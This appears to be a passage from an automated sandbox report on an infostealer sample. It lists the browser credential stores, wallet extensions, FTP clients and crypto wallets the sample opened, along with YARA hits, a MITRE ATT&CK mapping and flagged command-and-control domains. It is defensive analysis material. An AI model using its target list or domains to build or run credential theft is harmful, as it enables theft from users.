              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153485433.000000000143F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2126656306.000000000143F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157189871.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156552195.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156115915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154213981.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154539398.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153850742.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157640041.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157558824.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157692564.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156174138.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154355396.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154850017.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156037411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154796125.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156976484.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106766668.000000000143F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154725777.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154129411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154641557.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157138050.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153793686.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2158045803.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155243058.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155948563.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155317529.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2081770128.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154029832.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155652947.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156895572.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155068276.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156371674.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2156729304.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2157064648.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2155858032.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2154297810.0000000001440000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2081624288.0000000001437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1532, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (one column per tactic; a number preceding a technique name is the report's count of triggered signatures mapped to that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 34 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 751 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 34 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 11 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label | Link
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
http://crl.microsoft | 0% | URL Reputation | safe |
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe |
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.97.3 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
fadehairucw.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/7 | file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiB | file.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202292935.0000000001450000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183317892.000000000144F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/apite | file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.microsoft | file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202261431.0000000001421000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
